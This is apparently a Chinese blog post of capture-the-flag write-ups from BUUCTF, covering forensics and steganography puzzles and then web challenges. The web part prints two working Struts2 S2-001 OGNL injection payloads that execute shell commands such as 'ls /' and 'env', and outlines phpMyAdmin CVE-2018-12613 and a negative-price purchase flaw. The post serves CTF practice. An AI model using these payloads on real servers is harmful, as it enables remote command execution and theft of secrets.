• BUUCTF-做题记录


    很久没做题了,还是随便来水一水吧,之前都在学别的。

    [INSHack2017]remote-multimedia-controller

    在这里插入图片描述
    流量包,因此选择直接搜看有没有flag
    在这里插入图片描述
    针对该流进行tcp流的跟踪。
    在这里插入图片描述
    发现存在一个特殊字符串,用CyberChef直接梭
    在这里插入图片描述
    flag:

    flag{TCP_s0ck3t_4n4lys1s_c4n_b3_fun!}
    
    • 1

    [INSHack2017]hiding-in-plain-sight

    在这里插入图片描述
    直接用tokeii👴网站的工具
    在这里插入图片描述
    然后将foremost后的结果进行下载。
    在这里插入图片描述
    得到隐藏的flag
    在这里插入图片描述
    flag:

    flag{l337_h4xx0r5_c0mmun1c473_w17h_PNGs}
    
    • 1

    [QCTF2018]X-man-Keyword

    在这里插入图片描述
    查看lsb,发现通道内有东西,直接用脚本解得到一串字符。

    PVSF{vVckHejqBOVX9C1c13GFfkHJrjIQeMwf}
    
    • 1

    根据lovekfc,然后进行关键字解密
    在这里插入图片描述
    再根据大小写修改一一对应的位置,得到真正的flag

    flag{cCgeLdnrIBCX9G1g13KFfeLNsnMRdOwf}
    
    • 1

    [BSidesSF2019]diskimage

    在这里插入图片描述

    老样子zsteg梭一下
    在这里插入图片描述
    提取出该数据
    在这里插入图片描述
    然后利用kali自带的testdisk提取其中的图片

    testdisk 1.dat
    
    • 1

    在这里插入图片描述
    把这个图片重命名为1.png打开得到flag
    在这里插入图片描述
    flag:

    flag{FAT12_FTW}
    
    • 1

    [2022红包题]虎年大吉

    在这里插入图片描述
    工具题,用ciphey直接解
    在这里插入图片描述
    flag:

    flag{29186995}
    
    • 1

    [WMCTF2020]行为艺术

    在这里插入图片描述
    打开后有hint.txt,内容

    md5sum flag.zip
    17f5b08342cf65f6dc08ed0b4c9bd334 flag.zip

    另一个文件则是一个图片,里面有504B开头,盲猜应该是一个压缩包的十六进制,但是好像没看见尾部,所以修改图片的高度。
    在这里插入图片描述
    得到完整的图片
    在这里插入图片描述
    提取出来得到

    504B0304140000000800DB93C55086A39007D8000000DF01000008000000666C61672E74787475504B0E823010DD93708771DDCCB0270D5BBD0371815A9148AC6951C2ED9D271F89C62E2693D7F76BB7DE9FC80D2E6E68E782A326D2E01F81CE6D55E76972E9BA7BCCB3ACEF7B89F7B6E90EA16A6EE2439D45179ECDD1C5CCFB6B9AA489C1218C92B898779D765FCCBB58CC920B6662C5F91749931132258F32BBA7C288C5AE103133106608409DAC419F77241A3412907814AB7A922106B8DED0D25AEC8A634929025C46A33FE5A1D3167A100323B1ABEE4A7A0708413A19E17718165F5D3E73D577798E36D5144B66315AAE315078F5E51A29246AF402504B01021F00140009000800DB93C55086A39007D8000000DF010000080024000000000000002000000000000000666C61672E7478740A00200000000000010018004A0A9A64243BD601F9D8AB39243BD6012D00CA13223BD601504B050600000000010001005A000000FE00000000000000
    
    • 1

    在这里插入图片描述
    得到加密后的zip文件。
    利用010查看发现是一个伪加密,修改对应的位由09改为00
    在这里插入图片描述
    打开后有一个典型的brainfuck编码
    在这里插入图片描述
    利用网站一把梭
    在这里插入图片描述
    flag:

    flag{wai_bi_baaaa_bo!2333~~~}
    
    • 1

    [MRCTF2020]寻找xxx

    在这里插入图片描述
    打开来有个wav,里面是拨号音,直接丢在线解码工具进行解,得到号码。
    (由于在BUUCTF进行复现,所以只能做到这一步)
    在这里插入图片描述
    flag去网上随便找的

    flag{Oh!!!!!_Y0u_f1nd_my_secret}
    
    • 1

    [ThinkPHP]IN SQL INJECTION

    在这里插入图片描述
    利用payload获取数据库名
    在这里插入图片描述
    然后在爆破信息里面就有flag了
    在这里插入图片描述

    [PHPMYADMIN]CVE-2018-12613

    在这里插入图片描述
    先利用sql执行输入phpinfo
    在这里插入图片描述
    查看一下session的 值
    在这里插入图片描述
    由于session已经进行了存储,因此可以直接访问session 的文件得到phpinfo()
    在这里插入图片描述
    查到flag
    在这里插入图片描述

    [struts2]s2-001

    在这里插入图片描述

    利用payload实现命令执行
    在这里插入图片描述
    在password框内输入要执行的命令
    在这里插入图片描述

    %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","/"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
    
    • 1

    根据经验,一般都在env环境变量当中有flag
    在这里插入图片描述

    %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
    
    • 1

    [第三章 web进阶]逻辑漏洞

    在这里插入图片描述
    打开一个登陆界面,然后随便输入admin/123进行登陆
    在这里插入图片描述
    进入后有个卖书的位置
    在这里插入图片描述
    直接买flag买不起
    在这里插入图片描述
    尝试购买nice,发现可以购买
    在这里插入图片描述
    利用购买的成功请求包,将cost参数改成复数。
    在这里插入图片描述
    改成-9999
    在这里插入图片描述
    重新购买得到flag
    在这里插入图片描述

  • 相关阅读:
    SpringCloud相关技术总结
    WebSSH远程管理Linux服务器、Web终端窗口自适应(二)
    C++ 异常处理机制详解:轻松掌握异常处理技巧
    二叉树算法 + 习题(JavaScript)
    Spring事务和事务传播机制
    本机idea连接虚拟机中的Hbase
    Python文件操作及光标移动介绍
    初学Matlab第一天
    第17集丨如何为成功“保鲜”
    贝赛尔曲线
  • 原文地址:https://blog.csdn.net/qq_46230755/article/details/129111660